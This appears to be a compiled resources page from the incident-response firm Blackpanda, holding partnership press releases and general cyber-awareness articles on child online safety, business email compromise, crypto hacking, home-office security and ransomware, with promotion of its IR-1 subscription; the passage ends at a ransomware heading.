A collection of resources for you to skill up and stay informed.
Browse our resources for the latest cyber news, cyber security best practice, and company updates. Already know what you’re looking for? Simply filter by topic, content type, and skill level.
SB C&S Corp. (Head office: Minato-ku, Tokyo; President and CEO: Yasuo Mizoguchi; hereinafter "SB C&S") has concluded a distribution agreement with BLACKPANDA JAPAN K.K. (Head office: Chiyoda-ku, Tokyo; Representative Director: David Yu Suzuki; hereinafter "Blackpanda") in Japan and will commence the distribution of Blackpanda’s “IR-1” incident response service from March 14, 2024.
SB C&S Corp. (Head office: Minato-ku, Tokyo; President and CEO: Yasuo Mizoguchi; hereinafter "SB C&S") has concluded a distribution agreement with BLACKPANDA JAPAN K.K. (Head office: Chiyoda-ku, Tokyo; Representative Director: David Yu Suzuki; hereinafter "Blackpanda") in Japan and will commence the distribution of Blackpanda’s “IR-1” incident response service from March 14, 2024.
Blackpanda's IR-1 is an incident response service designed for small and medium-sized businesses. In the event of a cyber incident such as ransomware infection or business email fraud, Blackpanda helps the client to return to normal operations as soon as possible by isolating the affected systems and investigating the root cause. Incident response services are generally expensive to implement, but IR-1 is designed to be accessible to small and medium-sized businesses, being offered in a subscription format starting from one incident response credit at ¥350,000※per year.
(*For companies with less than 250 endpoints, prices exclude tax, as of March 2024)
Under the agreement, SB C&S will promote Blackpanda's service offerings through its nationwide sales network of approximately 13,000 partner companies.
Endorsement from Mr. David Yu Suzuki, Representative Director, BLACKPANDA JAPAN K.K.
“Blackpanda Japan looks forward to further deepening its cooperation with SB C&S. We aim to provide innovative cyber security solutions in the Japanese market with localized, complete support.
Customers today require more advanced cyber security measures and incident response services, but many Japanese companies face challenges posed by a lack of relevant resources and expertise. The cooperation between Blackpanda and SB C&S will enable the creation of a stronger cybersecurity ecosystem in Japan. We are committed to promoting this on a national scale.”
Endorsement from Mr. Yasuo Mizoguchi, President and CEO, SB C&S Corp.
“While digitization in all fields is progressing rapidly, the number of cyber attacks is increasing day by day. Not only large enterprises but also small and mid-sized companies need to take more security measures, including against attacks targeting their supply chains. Blackpanda's "IR-1" solution, which aims to "democratise cyber resilience," is a packaged service optimized for small and medium-sized enterprises, from proactive prevention using ASM scanning to post-incident response. We will continue to work with Blackpanda to provide our customers with robust secure cyber security solutions through our nationwide sales partners.”
About BLACKPANDA GROUP
Blackpanda is Asia's leading local cyber incident response firm, dedicated to delivering world-class digital emergency response services to businesses in the region. We help businesses strengthen their cyber resilience and secure their digital operations by supporting them with incident response delivered by local experts.
Our mission is to make cyber resilience achievable for all, with services and solutions designed for the Asian market.
https://www.blackpanda.com
About SB C&S Corporation
SB C&S inherited the IT distribution business of Softbank Group, the group’s original business. SB C&S strives to rapidly identify changes in the market environment and create new business models. For corporate customers, SB C&S provides product solutions utilizing advanced technologies including cloud computing and AI through the largest sales network in Japan. For consumers, we are leveraging our unique planning and development capabilities to expand our product lineup from software and mobile accessories to IoT products and services. For more information, please visit our website at https://cas.softbank.jp/
SoftBank and the SOFTBANK name and logo are registered trademarks or trademarks of SOFTBANK Group Corp. in Japan and other countries.
All other company names and product/service names mentioned in this notice are registered trademarks or trademarks of their respective companies.
For inquiries regarding this matter, please contact
SB C&S Public Relations and PR Office (c/o Antil, Inc.)
The Blackpanda team is thrilled to unveil our refreshed brand. Months of research, workshops, and creative effort have led to a refined brand that represents our company and the work we do better than ever before.
With a newly defined commitment to the cyber resilience of Asian businesses (see “Our Vision”), Blackpanda clearly stakes out its position in a crowded market. Blackpanda stands for local, specialised and technology-driven incident response, dedicated to delivering world-class emergency response services to businesses in the Asian region.
Our visual brand, too, has undergone a refinement process. Granted, anyone outside of Blackpanda may not notice much difference, but small changes to imagery can be powerful nonetheless. Where our old logo included a reference to founding members’ proud history in the armed forces, our new logo turns the focus on our digital specialisation and Blackpanda’s unique ability to leverage in-house data to constantly develop better products.
With a renewed focus on our mission to make cyber resilience achievable for all, we have also redesigned our website for clearer information and easier use. Our flagship product IR-1 by Blackpanda takes pride of place, and we have made it easier for existing and potential partners to find relevant information. We hope you enjoy the new website!
Want to talk to our team about our products and services? Contact us today using our easy online forms.
Hong Kong, 19 October 2023 - In a strategic alliance set to redefine cyber resilience for SMEs across Asia, Blackpanda and Bare Cove Technology join forces to address digital threats as a cohesive whole. This collaboration fuses Blackpanda’s capability in incident response and digital forensics with Bare Cove’s advanced cyber consultancy and managed services to offer a comprehensive and dynamic cyber security strategy tailored specifically for SMEs.
In a recent poll conducted by Blackpanda, 66% of businesses responded that, when facing a cyber breach, they would turn to their managed services providers (MSPs) for assistance. This finding underscores the pivotal role managed service providers play in bolstering cyber security and their position as a trusted first point of contact during a cyber crisis.
Gene Yu, Founder and CEO, Blackpanda, said, “The collaboration between Blackpanda and Bare Cove is timely, as this not only resonates with our core mission to democratise cyber resilience but also marks a major milestone in the marketplace. We are here to empower managed service providers to elevate their business proposition with robust incident response capabilities. This is a synergistic approach to fortify the first line of defence with the vital tools needed to build an integrated cyber resilience solution against digital threats. We believe it’s game changing for MSPs.”
Emily Randall, Founder and CEO, Bare Cove Technology, added, “At Bare Cove Technology, we are committed to delivering comprehensive solutions that cater to the specific needs of Asia-based financial firms. By teaming up with Blackpanda, we are taking our expertise to the next level by leveraging our combined strengths to offer a more comprehensive range of services, from cutting-edge cyber security testing to incident response readiness. This collaboration not only strengthens our individual accomplishments but also allows us to address the evolving cyber security challenges that are deeply needed by businesses in the Asia Pacific region.”
This strategic alliance brings together an unparalleled team of cyber security specialists in cloud technologies, IT infrastructure, automation, penetration testing, digital forensics, and incident response. Together, Blackpanda and Bare Cove Technology harness the most recent innovations in cyber security to enhance capabilities and align with global regulatory demands to help SMEs navigate today’s digital landscape more securely.
About Blackpanda
Blackpanda is Asia's premier local cyber incident response firm, dedicated to delivering world-class digital emergency response services to businesses in the region. Blackpanda exists to defend organisations across APAC. We help businesses strengthen their cyber resilience and secure their digital operations by supporting them with incident response delivered by local experts. Our mission is to make cyber resilience achievable for all, with services and solutions designed for the Asian market. For more information, please visit www.blackpanda.com.
About Bare Cove Technology
Bare Cove Technology (BCT) is an award-winning IT and cybersecurity solutions provider. Our team is made up of proven leaders in the fields of cyber security, software development, cloud technologies, and IT infrastructure and design. Based in Hong Kong, Singapore, and Australia, BCT supports the top asset managers in the Asia Pacific region, helping our clients meet the evolving expectations of institutional investors and global regulators. For more information, please visit www.barecovetech.com.
SINGAPORE, October 12, 2023 – In an important strategic move that promises to expand digital forensic and incident response (DFIR) investigation capabilities in the Asia Pacific region, Binalyze has successfully secured a deal with Blackpanda, a renowned incident response firm based in Singapore.
This milestone collaboration started almost one year ago. Blackpanda, following ten months of thorough evaluation, selected to work with Binalyze after considering many different DFIR technologies within the market.
This partnership will be formally announced at the upcoming GovWare 2023 event, 17-19 October, where Binalyze, in association with its regional distributor Athena Dynamics, is showcasing the innovative capabilities of its Binalyze AIR platform.
Emre Tinaztepe, CEO and Founder of Binalyze, and Gene Yu, Founder & CEO of Blackpanda, will both be in attendance, and GovWare will mark the formalizing of this new synergistic partnership. Binalyze AIR having been successfully chosen based on its clear technological superiority.
Emre Tinaztepe, speaking on the occasion, shared, “At Binalyze, we envision a future where technology seamlessly integrates with human expertise to advance digital forensics.
AIR has been designed to speed up key processes associated with DFIR, such as evidence collection and presenting this information back with key recommendations and observations. With Blackpanda, we've found a partner who shares our vision and recognizes the transformative potential of our AIR platform.”
Binalyze's AIR platform stands out in a marketplace marketplace of traditional Incident Response forensic solutions, built from the ground up to be intuitive to use, enhancing evidence capture at speed and significantly reducing analyst overhead, all thanks to its state-of-the-art automation features. Its introduction to Blackpanda's suite of services comes at a time when rapid, accurate, and streamlined response mechanisms are of utmost priority in cybersecurity.
Gene Yu said, “Leveraging innovation, partnering with Binalyze has been a game-changer to stay at the forefront of cyber resilience. At Blackpanda, we're committed to empowering businesses with attack surface risk management scans alongside rapid emergency response services during cyber attacks. In the critical battle to contain cyber breaches, precision and speed are paramount to democratize our digital emergency response capabilities - ensuring we act swiftly and effectively to help as many victims as possible.”
This partnership is a testament to the continuous evolution and dedication both companies hold toward fortifying digital estates. As cyber threats grow in complexity, collaborations such as these pave the way for a safer, more resilient digital ecosystem.
About Binalyze
Binalyze is the creator of the world’s fastest and most comprehensive DFIR solution, AIR.
AIR remotely, securely, and automatically collects over 350 digital forensic artifacts in under 10 minutes.
With evidence collected, its Timeline, Triage, interACT, and DRONE product features helps organizations analyze, investigate, collaborate, and complete incident response investigations quickly to dramatically reduce dwell time.
Binalyze’s AIR saves time, reduces cyber security operational costs in both MSSPs and large enterprises’ SOCs, and helps prevent financial and reputational losses associated with cyber attacks.
In September 2023, Binalyze announced it had raised $19M through its Series A investment round. This was led by Molten Ventures with participation from existing investors, Earlybird Digital East and OpenOcean, and new strategic investors Cisco Investments, Citi Ventures, and Deutsche Bank Corporate Venture Capital.
Blackpanda is Asia's premier local cyber incident response firm, dedicated to delivering world-class digital emergency response services to businesses in the region.
Blackpanda exists to defend organizations across APAC. We help businesses strengthen their cyber resilience and secure their digital operations by supporting them with incident response delivered by local experts.
Our mission is to make cyber resilience achievable for all, with services and solutions designed for the Asian market.
Gone are the days when kids received their first phone in middle school—today, children of elementary school age are already tied to their smartphones. It is paramount to establish open and honest channels of communication with your children about safety, privacy, and the Internet.
Deemed as a “cyber pandemic”, the Child Online Safety Index (COSI) of Singapore highlights that 60% of children aged 8–12 who are active online users are exposed to cyber risk. Moreover, 45% of children within the same age range are affected by cyberbullying (proven to have long-standing mental health implications among youth).
While the cyber world and the threats that loom within it might seem daunting, it need not be. Here are some tips to help keep your kids safe online.
1. Teach Kids About Secure Passwords
Using your dog's name, best friend's name, favorite sports team, or birthday as your password is not the way to go—a common mistake made not only by kids but also many adults! As a refresher, a good password contains capital and lowercase letters, numbers, symbols, and is at least 10 characters long. Length matters a lot!
Hackers have gotten very good at cracking passwords. Some automated programs can hack simple passwords in hours, even minutes if the user inputs known facts about the victim like birthdays, pet names, or anniversaries. Kids may have a higher tendency to overshare online as they may not yet have a solid understanding of privacy. This makes them easier targets for these kinds of password-cracking tactics.
Another common mistake made by children is sharing passwords with their friends or logging into their social media accounts on a friend’s device and forgetting to log out. Explain to your children the effects of sharing login credentials—if your friend gets hacked, you may be compromised too. Lastly, you can check if your children’s credentials (or yours) have already been compromised using services like ‘have i been pwned’.
2. Understand the Risks of Torrenting and Illegal Streaming
While torrenting a movie may be a free alternative, the low price tag comes with many hidden costs—including downloading malware or any ransomware payments to restore encrypted files following a breach. Even illegal streaming sites often use ‘malvertising’ (malware advertising) pop-up windows disguised as a general advertisement. As many or most of these services are illegal, you and your children should not trust any downloads or interaction with such sites.
Talk to your kids about the risk of these services and, if necessary, implement appropriate parental controls on your children’s browser for added security. Use Internet content filters to block accessing or downloading unwanted web content such as offensive, malicious, or scamming content.
3. Educate Your Children on the Value of Privacy and Boundaries
Kids these days tend to overshare on social media. It is crucial that children understand the meaning and importance of privacy and boundaries.
“Stranger danger” is real and more prevalent than ever on social media with the rise of social engineering. Put simply, social engineering is a non-technical strategy used by cyber attackers that leverages human interaction and relationships to gain unauthorized access to accounts, files, and systems.
The same way your children should not talk to or give personal information to a stranger on the street, this habit should extend into the cyber realm. As a parent, you can protect your child by starting discussions on privacy and online interactions early, even before the day they are given access to a smart device.
You can help your children set boundaries by implementing rules and agreements on using electronic devices such when, where and why. Use technology such as parental control applications to better enforce these agreements.
4. Be Aware of and Teach Kids How to Identify Signs of Cyberbullying
Lastly, a child’s online security extends to a child’s mental health when interacting online. Cyberbullying comes in many shapes and forms including disclosing someone’s personal or private information online without their consent, harmful comments or messages, impersonation, and exclusion from e-groups. The effects of cyberbullying can manifest itself in many ways including lack of appetite, social isolation, and self-harm.
As adults, you must be able to identify these signs. Children often do not know when to speak up or feel ashamed, but it is important that they know that help is always there, should they need it. Below are some local resources that may help you if you suspect signs of cyberbullying.
Looking For Help in Singapore?
The Cyber Security Agency of Singapore has a website dedicated to cyber safety called “Gosafeonline”. The website is supplemented with Facebook, and Twitter pages where you can find practical bite-size tips and downloadable resources to educate yourself on online safety. A dedicated section for parents to learn more about protecting their children online also exists within the site.
Cyberbullying is a criminal offense under the Protection from Harassment Act (POHA) of Singapore. Report cyberbullying to the police. Similarly, cyberstalking and online harassment are also deemed as a criminal offenses under the POHA.
The Ministry of Education (MOE) has a Cyber Wellness education program, that conducts cyber wellness education through curriculum, workshops, talks, and activities in local schools. Resources from the MOE about Safeguarding your Child Online and the Guide for Parents on Setting Parental Controls are easily accessible.
Reference:
2020 Child Online Safety Index & Country Level Reports by the DQ Institute https://www.dqinstitute.org/child-online-safety-index/
A Business Email Compromise (BEC) is a type of cyber attack using email fraud to achieve some specific outcome which adversely affects the victims, usually involving financial fraud. BEC may be conducted by gaining direct, unauthorized access to an individual’s email account or by using a very similar email domain to impersonate an account (called ‘spoofing’).
BEC is one of the most financially damaging cyber crimes. In the United States alone, US$1.77 billion in losses were incurred in 2019 according to a report by the FBI. In Southeast Asia, financial hubs such as Singapore and Hong Kong are two of the most targeted markets for BEC attacks.
How does a typical BEC work?
A typical BEC scam involves phishing emails purportedly sent by senior employees in an attempt to trick the recipient into making fund transfers or divulging sensitive information. As such, attackers often target employees with key decision-making powers, especially those with the ability to authorize financial transactions such as CEOs and members of finance, accounting, or vendor management.
In some cases, attackers may silently monitor sensitive communications for months (or years!), auto-forwarding email conversations to their own inboxes. Attackers may closely study these conversations in order to map out reporting lines, communications procedures, standard documentation, and even the typical language used by their targets. The resulting phishing emails are often well-crafted, well-timed, and virtually indistinguishable from a legitimate request, including familiar letterheads, banking, and invoice instructions.
BEC scammers also commonly ‘spoof’ government organizations such as law enforcement, tax agencies, or healthcare entities to create a sense of authority, urgency, or fear to convince victims to act quickly.
Common tactics, techniques & procedures (TTPs) used By BEC scammers
Gaining Unauthorized Access
Collecting Intelligence
Attempts to defraud the organization or its clients
Stealing information
How to prevent BEC scams
Enable multi-factor authentication (MFA) on all user accounts. MFA requires any additional log-ins to provide a second method of authorization, blocking the majority of unauthorized access attempts
Enforce complex password requirements. The more complex the password, the less likely credentials are to be stolen or brute-forced
Minimize the number of employees with ‘Admin’ access to email configurations. Following the principle of least privilege to control and manage access reduces the number of targetable privileged accounts
Reset email account passwords regularly and immediately when suspicious activity is identified. Resetting passwords secures the account and kills any active sessions
Remove mailbox delegates who have been granted with read, send, delete or even full access of your mailbox depending on the setup. If any delegate’s account is compromised, your email account can be used in a BEC attack.
Disable mail forwarding rules to external domains. This action prevents BEC scammers from silently collecting email communications
Enable mailbox auditing and retain audit log for review. These logs would enable the organization to to monitor data, track potential security breaches or signs of internal misuse of information
Continuously educate employees on cybersecurity awareness and good cyber hygiene practices
What to do if you suspect a BEC scam
Do not interact with the suspicious email, including:
Do not click any links or embedded objects in the email
Do not open or download any attachments
Contact the sender or sender organization via phone or other out-of-band methods (such as WhatsApp) to verify the legitimacy of the email
If the message is not legitimate, report it to your IT Security team* immediately and forward the suspicious email as an attachment so that the team can analyze the email properly
Consult the IT Security team if you are not sure how to forward the original email as an attachment
Inform the team if you have interacted with the email or sender in any way
Reset passwords on any compromised accounts immediately
Analyze the email to identify any malicious content and its associated behavior
Analyze relevant logs to identify any indicators of compromise and perform exposure checks
Block the malicious domains identified and malicious sender address; add them to monitoring
Document and communicate broadly any lessons learned from the incident to improve company policies and controls
Conduct relevant employee awareness trainings to prevent similar attacks in the future
*If there are no internal IT Security team or other teams with the incident response expertise to handle such attacks, please consult a third-party incident response firm such as Blackpanda to assist you in resolving the issue.
With attacks on crypto companies–including the Crypto[.]com hack and the Coinbase vulnerability–headlining news outlets this month, consumer confidence is being shaken, and a host of questions are being raised about the cyber security of cryptocurrencies. At Blackpanda, we investigate cyber crimes committed across all technology verticals, including crypto.
As a rule of thumb in cyber security, if something has a connection to the internet, it can be hacked. The crypto industry is no different. This article will provide insight as to why the answer to the question “can crypto be hacked” is yes, and why everyone involved in the crypto space should be prepared to deal with a cyber incident.
Is my crypto investment safe?
In the world of technology, there is always some probability of a cyber incident taking place. Whether it is hacking, denial of service, insider threat, account compromise, or technical failure, all technology can be broken in some way, no matter how implausible it may seem.
The likelihood of an event is what usually has a defining impact on how we approach securing different technologies. In fact, the probability of someone manipulating every endpoint contributing to or reading from a blockchain is very low. However, if attackers succeed at compromising even a fraction of a widely used wallet or platform, this can bring them significant financial gains.
As the number of crypto technologies increases—and the total number of users increases with them—the number of attackers that turn their efforts to stealing a part of that goes up as well. That is the likelihood of a crypto hack.
But wait—isn't crypto hard to hack?
Attackers typically target companies that are low-effort, high-reward to hack. Remote access is a great example of this. Attackers constantly scan the Internet and send billions of packets, or “probes” looking for an open, vulnerable remote service port that would give them direct access into a company. This is much like knocking on every door in search for a target, hoping that someone left theirs unlocked.
Usually, threat actors will give up if a target seems too challenging to attack, or attacking them requires too much effort. Persistent threat actors, however, continually chip away at high-value targets until something gives, breaks, or introduces an opportunity for exploitation.
Crypto platforms are no different in that they run on several of the elements we see exploited. Stolen API keys, unprotected databases exposed to the internet, social engineering and phishing; each of these can be targeted, as they form a component in the overarching infrastructure that makes crypto work.
How do you hack crypto?
There are many ways to apply force to an attack surface, using the military terminology, with an aim to deny, degrade, disrupt, destroy, or deceive the target. The STRIDE model lists several cyber attack patterns and works well for developers and security teams to collaborate and answer, “What can be attacked and how?”
STRIDE stands for:
Spoofing—Whereby a user or program pretends to be another
Tampering—Whereby attackers modify components or code
Repudiation—Whereby threat events are not logged or monitored, or data can be modified
Information disclosure—Whereby data is leaked or exposed
Denial of Service (DoS)—Whereby services or components are overloaded with traffic to disrupt normal use
Privilege Escalation—Whereby attackers grant themselves additional permissions–even admin–to then gain greater control over a system
What can be hacked?
If we quickly apply this methodology to crypto, we will identify several components that make up the ATTACK SURFACE that can be targeted by the patterns in STRIDE.
Application back end
The back end of an application includes all the servers, developers systems, source code and repositories, third-party libraries or plug ins, and other parts of the blockchain technology. Just this week a bug was detected in the Coinbase application that allowed users to steal unlimited cryptocurrency. This exploit shows the API’s used can have zero-day vulnerabilities that attackers exploit to their advantage.
The most damaging to a company, however, is when the source code itself is corrupted. A malicious code release would manipulate the underlying functionality of the app to siphon or outright steal tokens and transfer them to an attacker’s wallet.
End user application
End users manage their access and authentication tokens, interact with the application through their browser, and often download an exchange’s app to their phone. An attacker can target the mobile or web based application.
A threat actor may try to perform a man in the middle attack. Think about a malicious extension in the browser that can steal all the wallet information as a user creates it. Out of date browsers, and suspicious browser extensions make this attack more likely. By attacking out of date browsers, criminals can gain access to information that is usually obtainable during account creation. Thus, sensitive data such as personal details and copies of private keys could be rendered vulnerable and accessible by cyber threat actors.
Sensitive information could also be intercepted during an internet session if the user is on an insecure network, such as public WiFi.
Network
The network spans user and company access to the platform, the content distribution network, and connectivity to the distributed servers performing proof of work or maintaining the ledger (depending on the type of platform). Though outages occur all the time, a prolonged outage between endpoints in the network would degrade the service and could stop the normal function of the blockchain.
Website
The website includes all public facing pages, the web servers, and plug-ins that allow people to learn more or sign up for services. Defacement of any website could damage the company’s reputation. A website takedown by denial of service would cause a business interruption and result in monetary losses.
_ _
Though it seems like an easy question, I am answering in this way because technology changes constantly, no surprise there. The cryptocurrency architecture of today may be entirely re-invented in a year’s time. It is important to have a repeatable process, not one-off procedures, to get an idea of how a hack could happen today. Look at any hacking problem as an attack surface, a threat, and the likelihood and probability that attack will succeed.
Though the likelihood of any of these attacks you identified in your threat model may stay the same or decrease with compensating controls, the probability increases every day as the number of attempts increase. Anything can be hacked, it is a matter of time and resources. Stay tuned for our next article where I dissect these attacks in more detail.
Your office is a fortress. You protect it with firewalls, anti-virus, backup power supplies, corporate policies, and a team of dedicated IT security professionals. These same layers of security and personnel in place at work are (most likely) not present in your home.
With more companies issuing indefinite work-from-home orders, we seem to have entered a new normal. Although working from home has its benefits, it also increases your exposure to a cyber attack. The threat landscape now extends to your home network.
The following are some simple but effective tips for helping you and your workforce protect your digital assets while working outside the security of your office.
Securing Your Network Connection
Your home router is the gateway to the outside world for all of your connected devices—laptops, mobile phones, smart TVs, AI assistants, etc. Everything you own that is connected to the Internet is a potential point of entry for attackers. Are you aware of how many devices are connected to your network right now? Is your router secure? What’s the worst that could happen if it isn’t?
For starters, unauthorised users can disable your router’s security and begin stealing personal information without you knowing. BotNet attacks can hijack an unsecured router to saturate your bandwidth and launch subsequent attacks. “Signal Surfers” can log in from just down the hallway using your easy-to-guess password, creating their own network using YOUR router.
But the risks go far beyond piggy-backing neighbours slowing down your connection speeds. Unauthorised users can also use your unsecured router to mask their own identity, committing serious crimes in YOUR name (or at least attributable to your gateway’s IP address).
When was the last time you updated your router? Have you never changed the default “Admin/Password” combination that controls your whole Wi-Fi router? Updating your home router is simple – it takes just a few minutes and can protect your home network from a number of critical vulnerabilities.
Secure your home router by following these simple steps:
Look up your router model online to determine your router’s central login address (e.g., “192.168.1.1” or “routerlogin.net”)
Enter your router’s login address into your web browser
Log in with the default username and password (usually both ‘admin’ or ‘admin/password’ - also searchable on the internet)
Go to settings and select ‘Change Router Password’ (or similar)
Enter your new password
Save settings
Once logged in, you should also check to see if there are any firmware updates available, install them, and enable “automatic updates” if not already selected.
After logging in, you can also see what devices are connected to your router. Do you recognize all of them? For added security, consider starting an asset inventory to keep track of all authorised and any unauthorised connections. Like account passwords, you should also change your Wi-Fi network passwords on a regular basis. Create a separate network or VLAN for “work” devices to separate them from your family’s many IoT, tablets, and non-business critical devices to further secure your network.
Other things you can do to secure your network connection include using a reputable VPN when connecting to public Wi-Fi, closing and terminating any Remote Desktop Protocol (RDP) or remote access sessions when finished, and updating your antivirus software regularly.
Separating Browsers for Work & Play
The ideally secure work-from-home office space would be off-limits to family and friends. That network would have a dedicated computer and network segment for work only, and even its own Internet connection. However, this is not always possible. With budgets tightening, companies may ask employees to use their own devices. Naturally, this means that people will be more likely to use a single device for both work and personal activity.
If you find yourself in this predicament, there are a couple of tips to greatly reduce the exposure to cyber threats. One of these is to ”silo” your web browsing activities – one browser for work, and one for personal. There are some cyber attacks that take advantage of the way web browsers store user information, field values, and even passwords. For example, if Chrome is your work browser and Mozilla Firefox is your personal browser, then it is more difficult for an attacker to leap from one to the other to gather data. By creating two silos, you reduce exposure.
Another simple practice that should become a habit is clearing your cookies and cache frequently. By doing so, you delete all saved information (like passwords) and help prevent websites from tracking you.
For your dedicated “work browser” you can also explore privacy-enhancing extensions and add-ons. Be sure to research any add-on solutions before you install, and recognize that some may (thankfully) block plugins such as javascript, flash, and other known vulnerable extensions.
Phishing Awareness
Phishing attacks aren’t only found in emails – you can be phished through a text message, phone call, or even Facebook. Your spam filters are usually not sharp enough to keep you safe from all forms of phishing. Especially when working from home, remain vigilant, and look for unusual characteristics.
For example: Do you know the sender? Can you see the full, original email header and verify the address? Does the language in the email read smoothly and sound normal? Is there a legitimate reason to click, download, or open a link or attachment? If the answer to the above is no, then assume it is a phishing email. Flag it as spam, delete it, and most importantly do NOT forward it to your coworkers, but to a dedicated security team member. If you need to inform someone else, take a screenshot and send it as a separate email or through another channel.
For any calls to action, visit the official page, and avoid accessing them through notifications or links sent to you unless you can verify the request. You owe attackers nothing.
What should I do to defend myself from cyber attacks?
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
Ransomware is a type of malware that targets an organization’s data. Attackers use it to hold valuable information hostage through encryption, requiring a ransom payment for it to be restored.
Ransomware affects millions of businesses globally and is currently growing at unprecedented rates — both in terms of the likelihood of a ransomware attack against your organization and of the average ransom amount requested. Ransomware is designed to spread across a network and target database and file servers, and can thus quickly paralyze an entire organization.
The motivation behind ransomware attacks is primarily economic, as companies are often willing to pay millions of dollars to the attackers in order to have their files unlocked, systems restored, and business operations resumed smoothly.
With cyber criminals continuously upgrading their malware and with attack strategies becoming increasingly sophisticated, these threat actors are developing resources to conduct cyber attacks of enormous magnitude and impact.
Stay-at-home notices introduced during the COVID-19 pandemic have contributed to increased organizational cyber vulnerabilities with employees using personal devices connected to home or shared networks which are far less secure than organizational ones. Combined with bad cyber hygiene and a lack of general awareness of cyber best practices, organizations are truly at risk of a cyber breach.
In this article, we take a deep dive to learn more about what ransomware is, how long this attack vector has been around, and its impact on businesses and individuals today.
Who created ransomware?
While Ransomware has been making headlines for at least the past three years as a novel attack vector, the first recorded ransomware attack occurred almost thirty years ago.
The first person to create a ransomware-type virus was Doctor Joseph Popp in 1989. His program—dubbed “AIDS Trojan''—was distributed via floppy discs to unknowing attendees of a research conference. Believing the discs were research tools, the victims inserted the malware into their computers. Once the disk was inserted, the ransomware started encrypting only the file names—rather than the files themselves, as it happens nowadays. The ransom request amounted to USD189, with the promise that instructions to decrypt their systems would be provided once the payment had been made. In fact, the ransomware had a flaw that made it possible to independently decrypt the files, without making the ransom payment.
Still, ransomware did not become the most common type of cyber attack until recently. Up until the early 2000s, Distributed Denial of Service (DDoS) attacks were more common than ransomware. This trend shifted with the catastrophic attack known as WannaCry, which in 2017 compromised entire sectors around the world, initiating what some have called “the era of ransomware.”
Ransomware is a crime punishable by imprisonment in most countries, either because of the breach of cyber-specific laws or other laws related to information theft and extortion. It is becoming increasingly debated whether laws should be put in place to ban the payment of ransomware. The US already has laws in place to punish those who pay ransoms to a select list of cyber threat actors. In the future, it is likely that most countries will ban the payment of ransoms completely, as these fuel the cyber criminal economy and empower attackers to produce more effective and dangerous ransomware.
How does ransomware work?
Although in some cases—such as with the famous WannaCry virus or NotPetya— ransomware can travel between computers without user interaction, ransomware attacks are typically carried out using a Trojan. A Trojan is a type of malware that is typically downloaded onto an endpoint from a user clicking a phishing link or opening an email attachment. As the mythical Trojan horse, it is disguised as benign software and can often pass undetected by Endpoint Detection and Response (EDR). Once it is inside the computer, the Trojan can delete, block, copy and modify data such as passwords and keyboard strokes, but also disrupts the performance of computers or computer networks opening the door for further malware.
Ransomware acts rapidly, and can encrypt important files on every single device on the network within hours, minutes, or even seconds, depending on the number of targets in the attack and whether or not the attacker has spent time silently monitoring and exfiltrating data prior to encryption.
After encrypting all files in a computer, the ransomware will display a message on the desktop, giving instructions on how to pay the fee to obtain the decryption key from the attackers. Some examples of ransomware messages include: "Your computer has been infected with a virus. Click here to resolve the issue", "Your computer was used to visit websites with illegal content. To unlock your computer, you must pay a $100 fine”, or "All files on your computer have been encrypted. You must pay this ransom within 72 hours to regain access to your data”.
Ransomware attacks and their variants are rapidly evolving to counter preventive technologies for several reasons. For one, the availability of malware kits through Ransomware-as-a-Service (RaaS) allows inexperienced hackers to conduct large-scale attacks. Secondly, the use of generic interpreters allows for the creation of cross-platform ransomware (for example, Ransom32 uses Node.js with a JavaScript payload). Finally, new ransomware techniques are emerging—including encrypting the complete disk instead of selected files and exfiltrating data—which make the ransomware’s work faster and more damaging to the victim.
There are three main ways for ransomware to infect your computer:
1. Malspam emails
Malicious spam, or “malspam” emails, are unsolicited malicious emails that are used to deliver malware. The email may contain the virus disguised as a credible attachment in the form of a PDF, Word document, or link to a malicious website. Malspam preys on human weaknesses, using social engineering to deceive people into opening attachments or clicking links by appearing to originate from a legitimate source (e.g., a trusted friend or reputable organisation).
2. Malvertising
Malicious advertising, otherwise known as “malvertising”, is another form of ransomware that requires little to no user interaction. While scrolling through a website, users are directed to criminal servers without even clicking on the advertisement, as these malicious ads often appear as pop-up windows.
It must be noted that reputable, legitimate websites are not immune to malvertising. You might have the latest and best computer protection, but all it takes is one wrong click or pop-up for you to fall prey to such attacks.
3. Ransomware-as-a-Service (RaaS):
Ransomware is so popular and effective among cybercriminals these days that many malicious actors operate Ransomware-as-a-Service (RaaS) business models in online criminal markets.
RaaS allows anyone who wants to access and use ransomware against another individual or business to do so by simply paying online providers for the service, significantly lowering the barrier for cyber criminals. Many RaaS providers operate with a high level of sophistication, offering competitive market prices and excellent customer support services to their criminal patrons.
How long does a ransomware attack take?
The lifespan of a cyberattack – the length of time a cyber attacker has free reign in an environment from the time they get in until they are eradicated– is its dwell time. The longer attackers have access to a network, the more opportunities they have to collect vital data and cause disruptions across the company’s digital systems.
On a global level, the average cyber dwell time in 2020 was 56 days. However, Asian companies are performing much worse than their US and EU counterparts when dealing with cyberattacks. In Hong Kong and Singapore attackers are often able to operate undetected for much longer, with most cyber attacks dwelling in systems between 90 and 180 days respectively, with some even lasting years.
Given the speed at which ransomware can hold your information hostage, time is of the essence. A few seconds can make the difference between securing valuable information and risking losing it while having to pay out a much bigger ransom. Having a good cyber incident response strategy in place is the best way to prepare your organization to promptly respond to a ransomware attack and minimize its dwell time.
The impact of ransomware
Ransomware can have a debilitating impact on organizations due to a variety of factors. Firstly, ransomware causes a temporary, and possibly permanent, loss of critical company data. This can bring about a complete shutdown of business operations for several days, resulting in financial loss from revenue interruption. Further financial losses are associated with remediation efforts, as companies without a good cyber insurance plan must bear the burden of incident response costs, as well as expenses for legal and PR activities related to the event.
On top of this, if the company decides to pay the ransom, this can put a several million dollar dent in its finances. It is important to note that paying the ransom does not guarantee that the data will be restored. Especially with the rise in semi-skilled attackers conducting ransomware, it often happens that the attackers themselves do not have a working decryption key. In fact, 1 in 5 small and medium enterprises (SMEs) that suffered a ransomware attack and paid the ransom do not get their data back.
In addition, decrypting files does not mean the malware infection itself has been removed. Relying on an experienced digital forensics and incident response provider like Blackpanda is the best way to ensure that there are no ongoing threats to your organization. Perhaps most dramatically, company reputation can be permanently damaged, as clients lose their trust in the organization’s ability to protect their sensitive information and provide them with good services.
How common is ransomware?
